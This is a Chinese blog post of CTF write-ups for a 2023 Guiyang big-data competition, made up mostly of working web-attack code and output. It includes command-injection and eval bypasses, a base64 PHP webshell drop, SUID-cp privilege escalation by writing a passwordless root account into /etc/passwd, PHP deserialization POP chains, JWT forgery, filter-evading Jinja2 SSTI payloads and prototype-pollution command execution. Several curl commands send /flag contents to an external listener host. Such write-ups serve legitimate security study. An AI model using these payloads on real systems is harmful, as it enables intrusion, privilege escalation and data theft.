2023 贵阳大数据 CTF 部分题解

发表于 分类于 阅读次数:

摸一下。

仔细ping

1
/?ip=nl%20flag.php
1
2
3
4
5
6
7
8
9
10
11
12
13

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Ping吗!</title>


</br><pre>     1	<?php
       
     2	$flag = "flag{CAmbVbbBafY6k3tRybmqvqvWJYg8ms7s}";
     3	?>
</pre>

</center>

May_be

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
highlight_file(__FILE__);
$a = $_GET['a'];
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $a))  {
    if (!preg_match("/sess|ion|head|ers|file|na|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log/i",$a)){
        eval($a);
    }else{
        die("May be you should bypass.");
    }
}else{
    die("nonono");
}
?>
1
2
3
http://39.107.68.43:35894/?a=eval(array_pop(next(get_defined_vars())));
1=system('ls /');
bin boot dev etc home lib lib64 media mnt opt proc pushflag.sh root run sbin srv start.sh sys tmp usr var
1
#flag单独写在某个文件中 #!/bin/bash echo $1 > /.ffffffIIIIIII44444444444gggg
1
1=system('find / -user root -perm -4000 -exec ls -ldb {} \;');
1
2
3
4
5
6
7
8
9
-rwsr-xr-x 1 root root 151168 Sep 24  2020 /bin/cp
-rwsr-xr-x 1 root root 55528 Jan 20  2022 /bin/mount
-rwsr-xr-x 1 root root 71912 Jan 20  2022 /bin/su
-rwsr-xr-x 1 root root 35040 Jan 20  2022 /bin/umount
-rwsr-xr-x 1 root root 58416 Feb  7  2020 /usr/bin/chfn
-rwsr-xr-x 1 root root 52880 Feb  7  2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 88304 Feb  7  2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44632 Feb  7  2020 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63960 Feb  7  2020 /usr/bin/passwd
1
1=system('echo "PD9waHAgcGhwaW5mbygpO2V2YWwoJF9QT1NUWzFdKTs=" | base64 -d > 1.php');
1
root2::0:0::/root:/bin/bash
1
2
3
(www-data:/tmp) $ cp /tmp/passwd /etc/passwd
(www-data:/tmp) $ su root2 -c "/.ffffffIIIIIII44444444444gggg"
/.ffffffIIIIIII44444444444gggg: line 1: flag{mhbFHhwweJj4QuhveSQTsYXUCscvMbNd}: command not found

notrce

1
l''s | cu''rl -d @- -X POST http://175.178.111.34:7777

pop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
highlight_file(__FILE__);
class TT{
    public $key;
    public $c;
    public function __destruct(){
        echo $this->key;
    }

    public function __toString(){
        return "welcome";
    }
}

class JJ{
    public $obj;
    public function __toString(){
        ($this -> obj)();
        return "1";
    }
    public function evil($c){
        eval($c);
    }
    public function __sleep(){
        phpinfo();
    }
}

class MM{
    public $name;
    public $c;
    public function __invoke(){
        ($this->name)($this->c);
    }
    public function __toString(){
        return "ok,but wrong";
    }
    public function __call($a, $b){
        echo "Hacker!";
    }
}
$a = unserialize($_GET['bbb']);
throw new Error("NoNoNo");

Fatal error: Uncaught Error: NoNoNo in /var/www/html/index.php:43 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 43

在MM类的__invoke函数getshell,需要把MM当函数处理,在JJ的__toString$this -> obj当函数处理了,在TT的__destruct$this->key当字符串。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<?php

class TT{
    public $key;
    public $c;

}
class JJ{
    public $obj;

}
class MM{
    public $name;
    public $c;

}

$c = new MM();
$c->name = "system";
$c->c = "cat /flag";

$b = new JJ();
$b -> obj = $c;

$a = new TT();
$a->key = $b;


echo serialize($arr);

throw new Error("NoNoNo");

1
http://123.56.174.142:52862/?bbb=O:2:%22TT%22:2:{s:3:%22key%22;O:2:%22JJ%22:1:{s:3:%22obj%22;O:2:%22MM%22:2:{s:4:%22name%22;s:6:%22system%22;s:1:%22c%22;s:9:%22cat%20/flag%22;}}s:1:%22c%22;N;
1
flag{ftJmMSTRfrtuYvNrXyndyMT9vnX4hGhr} 1

Hackerconfused

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
<?php
error_reporting(0);
$CanRead = false;
class SFile{
    public $name;
    public function __construct($name) {
        $this->name = $name;
    }
    public function __toString(){
        $num = count(scandir($this->name));
        if($num > 0){
            return 'Not null';
        } else {
            return 'Access the backdoor_******.php.* in [0-f]';
        }
    }
}
class Funny{
    public $name;
    public function __construct($name){
        if(strstr($name, 'backdoor')===false){
            $this->name = $name;
        }else{
            $this->name = 'nohint.txt';
        }
    }
    public function __toString(){
        return $this->name;
    }
    
    public function __destruct(){
        global $CanRead;
        if(strstr($name, 'backdoor')!==false){
            die('try again');
        }
        if($CanRead){
            echo(file_get_contents($this->name));
        }
    }
}
class Fun{
    public $secret = 'nohint.txt';
    public function __wakeup(){
        echo $this->secret;
    }
    
    public function __toString(){
        global $CanRead;
        $CanRead = true;
        return (new Funny($this->secret))->name;
    }
}

if(isset($_GET['p'])){
    unserialize(base64_decode($_GET['p']));
}else{
    show_source(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
class SFile{
    public $name ;
    public function __construct($name) {
        $this->name = $name;
    }
}
class Funny{
    public $name;
}
class Fun{
    public $secret;
}
$path = $_GET["path"];
$fun = new Fun();
$fun->secret = new SFile($path);
echo urlencode(base64_encode(serialize($fun)));
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests

path = "glob://./backdoor_"
get_payload_url = "http://127.0.0.1:7777/2023/gz/no.php"
exp_url = "http://47.93.30.67:38017/"
dic = "1234567890abcdef.ph"

flag = True
while flag:
    flag = False
    for i in dic:
        r = requests.get(url=get_payload_url, params={"path": path + i + "*"})
        p = r.text
        r = requests.get(url=exp_url, params={"p": p})
        if r.text == "Not null":
            path = path + i
            flag = True
            print(path)
            break
# glob://./backdoor_a5f9d3.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
class Funny{
    public $name = "php://filter/convert.base64-encode/resource=backdoor_a5f9d3.php";
}
class Fun{
    public $secret;
}

$fun = new Fun();
$fun2 = new Fun();
$fun->secret = new Funny();
$fun2->secret = $fun;
//unserialize(serialize($fun2));
echo urlencode(base64_encode(serialize($fun2)));
1
http://47.93.30.67:38017/?p=TzozOiJGdW4iOjE6e3M6Njoic2VjcmV0IjtPOjM6IkZ1biI6MTp7czo2OiJzZWNyZXQiO086NToiRnVubnkiOjE6e3M6NDoibmFtZSI7czo2MzoicGhwOi8vZmlsdGVyL2NvbnZlcnQuYmFzZTY0LWVuY29kZS9yZXNvdXJjZT1iYWNrZG9vcl9hNWY5ZDMucGhwIjt9fX0%3D
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import base64
import os

f = open("1")
f_res = base64.b64decode(f.read())
f_res = f_res.replace("eval".encode(), "print_r".encode())
f.close()

ff = open("1.php", "w")
ff.write(f_res.decode())

while True:
    r = os.popen("/Applications/MAMP/bin/php/php8.2.0/bin/php 1.php").read().strip()
    print(len(r))
    ff = open("1.php", "w")
    if "error" in r:
        break
    else:
        ff.write("<?php echo" + r[4:])
        print(r)
    ff.close()




1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php 
$erzo_f851f55b = [base64_decode('ZmxhZ3sjX2FiY2RlZn0='), base64_decode('ZmxhZ3tiMHdfYjB3fQ=='), base64_decode('ZmxhZ3t0ZXRfZmxhZ30='), base64_decode('ZmxhZ3s5OSF6elN3Y30='), base64_decode('ZmxhZ3tkZWJ1R19mdHd9'), base64_decode('ZmxhZ3toZWxsX3llYWh9'), base64_decode('ZmxhZ3t0NHN0fQ==')];
$igxc_9ce88802 = '';
$bbmg_1b267619 = 0;
foreach ($erzo_f851f55b as &$djkg_417c4fa3) {
    $igxc_9ce88802 = $djkg_417c4fa3[$bbmg_1b267619] . $igxc_9ce88802;
    $bbmg_1b267619++;
};
if (isset($_GET[$igxc_9ce88802])) {
    $grxe_fd6b6fc9 = $_GET[$igxc_9ce88802];
    $pgck_32cfe6c1 = base64_decode($grxe_fd6b6fc9);
    $jipp_8a561003 = substr($pgck_32cfe6c1, 5, -5);
    echo $jipp_8a561003;
    system($jipp_8a561003);
} else {
    echo base64_decode('NDA0');
};
1
2
http://47.93.30.67:38017/backdoor_a5f9d3.php?4h{galf=YWFhYWFscyAvYWFhYWE=
/readflagUsage: /readflag give me the flag
1
http://47.93.30.67:38017/backdoor_a5f9d3.php?4h{galf=YWFhYWEvcmVhZGZsYWcgZ2l2ZSBtZSB0aGUgZmxhZ2FhYWFh
1
/readflag give me the flagflag{cQfGDnSt85Mxkua2u9hxSeshES8sK2s8}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#include <stdio.h>

int main(int argc, char *argv[]) {
    seteuid(0);
    setegid(0);
    setuid(0);
    setgid(0);
    
    if(argc < 5) {
        printf("Usage: %s give me the flag\n", argv[0]);
        return 1;
    }

    if ((strcmp(argv[1], "give") | strcmp(argv[2], "me") | strcmp(argv[3], "the") | strcmp(argv[4], "flag")) != 0) {
        puts("You are not worthy");
        return 1;
    }

    char flag[256] = { 0 };
    FILE* fp = fopen("/flag", "r");
    if (!fp) {
        perror("fopen");
        return 1;
    }
    if (fread(flag, 1, 256, fp) < 0) {
        perror("fread");
        return 1;
    }
    puts(flag);
    fclose(fp);
    return 0;
}

完美网站

1
2
3
curl http://39.107.27.191:21600/\?img\=dHVwaWFuLnBuZw\=\=
别重定向了,赶快让我(?n=30-10,以内的数值。)-_-<br />
<b>Notice</b>:  Undefined index: n in <b>/var/www/html/index.php</b> on line <b>11</b><br />

固定n爆破拿到图片,尾部ffffpq.php。

不太喜欢flask的开发

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
GET / HTTP/1.1
Host: 123.56.175.221:48127
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,ja;q=0.6
Connection: close


HTTP/1.1 200 OK
Server: Werkzeug/2.2.3 Python/3.10.1
Date: Fri, 28 Apr 2023 14:37:37 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 115
Connection: close

you are not our client,please guess our SECRET_KEY and Generating cookies using keys ,then view /search?flag=***** 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
GET /search?flag=***** HTTP/1.1
Host: 123.56.175.221:48127
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,ja;q=0.6
Connection: close


HTTP/1.1 401 UNAUTHORIZED
Server: Werkzeug/2.2.3 Python/3.10.1
Date: Fri, 28 Apr 2023 14:39:32 GMT
Content-Type: application/json
Content-Length: 49
Connection: close

{"msg":"Missing cookie \"access_token_cookie\""}

Jwt加密,密码是tomcat

1
2
3
4
{
  "sub": "admin"
}
# eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.p7j5Fnbpfmw45f43J0ZkFs_JXs1h_rRozLAZEjsbdVM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /search?flag={{config}} HTTP/1.1
Host: 123.56.175.221:48127
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,ja;q=0.6
Cookie: access_token_cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.p7j5Fnbpfmw45f43J0ZkFs_JXs1h_rRozLAZEjsbdVM
Connection: close


提示flag{the_flag_in_the_source_code}

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /search?flag={{lipsum["\x5f\x5fglobals\x5f\x5f"]["\x6fs"]["popen"]("tac+app\x2epy")["rea\x64"]()}} HTTP/1.1
Host: 123.56.175.221:48127
Cache-Control: max-age=0
Authorization: Basic dG9tY2F0OnRvbWNhdA==
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh-CN;q=0.9,zh;q=0.8,en;q=0.7,ja;q=0.6
Cookie: access_token_cookie=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhZG1pbiJ9.p7j5Fnbpfmw45f43J0ZkFs_JXs1h_rRozLAZEjsbdVM
Connection: close


flag{SsTi_IS_InTerEstinG!!!!!}

JUST_PROTO

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
const express = require('express');
const { exec } = require("child_process");
const app = express();
app.get('/', (req, res) => res.send('嗨嗨嗨!!老八来了!!!'));

let ba = {
    baba: (token)=>{ return !!token },
    bababa: ()=>{ if (JSON.stringify(date).length > 10000) date = {} }, 
    // set: `redis-cli -h ${ba.redis_host} set `
    // get: `redis-cli -h ${ba.redis_host} get `
};

let date = {};

app.get('/set', (req, res) => {
    ba.bababa(); 
    const {token, key, val} = req.query;
    if (!ba.baba(token) || !val) return res.send("wrong"); 
    date[token][key] = val; 
    res.json({ is_succ: true })
});

app.get('/get', (req, res) => {
    const {token, key} = req.query;
    if (!ba.baba(token)) return res.send("wrong");
    let result = date[token];
    if (result) result = result[key];
    res.json({ result: result === undefined ? "null" : result, is_succ: result !== undefined })
});


app.put('/bkup', (req, res) => {
    let date_stream = Buffer.from(JSON.stringify(date)); 
    const cmd = ba.redis_set + `date ${date_stream.toString('base64')}`;
    exec(cmd, (err,_,__) => {
        if (err) return res.json({ is_succ: false });
        res.json({ is_succ: true });
    });
});

app.listen(8080, () => console.log(`嗨嗨嗨!!老八来了!!!`));


//没敢吧所有变量名换成bababa 怕被打

1
http://39.106.154.70:26132/set?token=__proto__&key=redis_set&val=curl%20-F%20%22x=@/flag%22%20-X%20POST%20http://175.178.111.34:7777
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
(base) ubuntu@VM-8-15-ubuntu:~$ nc -lvvp 7777
Listening on 0.0.0.0 7777
Connection received on 39.107.243.76 11515
POST / HTTP/1.1
Host: 175.178.111.34:7777
User-Agent: curl/7.52.1
Accept: */*
Content-Length: 232
Expect: 100-continue
Content-Type: multipart/form-data; boundary=------------------------d021bc79c8a15513

--------------------------d021bc79c8a15513
Content-Disposition: form-data; name="x"; filename="flag"
Content-Type: application/octet-stream

flag{MbkFk47Rxcn3eJFRt2CmwxxWsWQw2VGa}

--------------------------d021bc79c8a15513--
1
{% set po=dict(po=a,p=a)|join%}{% set a=(()|select|string|list)|attr(po)(24)%}{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}{% set chr=x.chr%}{% set cmd=()%}{%if x.eval(cmd)%}aaa{%endif%}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import re

import requests

str = requests.get(
    "http://127.0.0.1:7777/2023/gz/no.php?cmd=" + 'cat /f1ag_g4lfcdecddefewfebge /|curl -d @- -X POST http://175.178.111.34:7777').text
result = ""


def half2full(half):
    full = ''
    for ch in half:
        if ord(ch) in range(33, 127):
            ch = chr(ord(ch) + 0xfee0)
        elif ord(ch) == 32:
            ch = chr(0x3000)
        else:
            pass
        full += ch
    return full


for i in re.findall('\d{2,3}', str):
    result += "chr(" + half2full(i) + ")~"
    # print(i)
print(result[:-1])

res = "{% set po=dict(po=a,p=a)|join%}{% set a=(()|select|string|list)|attr(po)(24)%}{% set ini=(a,a,dict(init=a)|join,a,a)|join()%}{% set glo=(a,a,dict(globals=a)|join,a,a)|join()%}{% set geti=(a,a,dict(getitem=a)|join,a,a)|join()%}{% set built=(a,a,dict(builtins=a)|join,a,a)|join()%}{% set x=(q|attr(ini)|attr(glo)|attr(geti))(built)%}{% set chr=x.chr%}{% set cmd=(" + result[:-1] + ")%}{%if x.eval(cmd)%}aaa{%endif%}"
url = "http://39.107.82.169:63151/?miniID=" + res
requests.get(url=url)

1
2
3
4
5
6
7
8
9
10
11
(base) ubuntu@VM-8-15-ubuntu:~$ nc -lvvp 7777
Listening on 0.0.0.0 7777
Connection received on 39.107.243.76 31879
POST / HTTP/1.1
Host: 175.178.111.34:7777
User-Agent: curl/7.64.0
Accept: */*
Content-Length: 38
Content-Type: application/x-www-form-urlencoded

flag{GCqYdG6x8Dt7Q3rvQfWuvx28UxC9Ctrx}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from flask import Flask,render_template,request,render_template_string
app = Flask(__name__)

@app.route('/',methods = ['POST','GET'])
def index():
    def safe_jinja(m):
        forbidden = ['[','{{','_','class','+','popen','*','import','request']
        for n in forbidden:
            while True:
                if n in m:
                    return "Forbidden!!!"
                else:
                    break
        return m
    id = request.args.get('miniID')
    html = '''
        <h2 align="center">it's time.Show me your documents,please.</h2>
        <h2 align="center">I will GET your miniID.</h2>
        <h2 align="center">%s</h2>
    '''%(id)
    html = safe_jinja(html)
    return render_template_string(html)
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80)

https://cloud.tencent.com/developer/article/2238031?areaSource=&traceId=

https://yagsheg.com/2021/05/08/SUID-%E6%8F%90%E6%9D%83%E5%B0%8F%E8%AE%B0/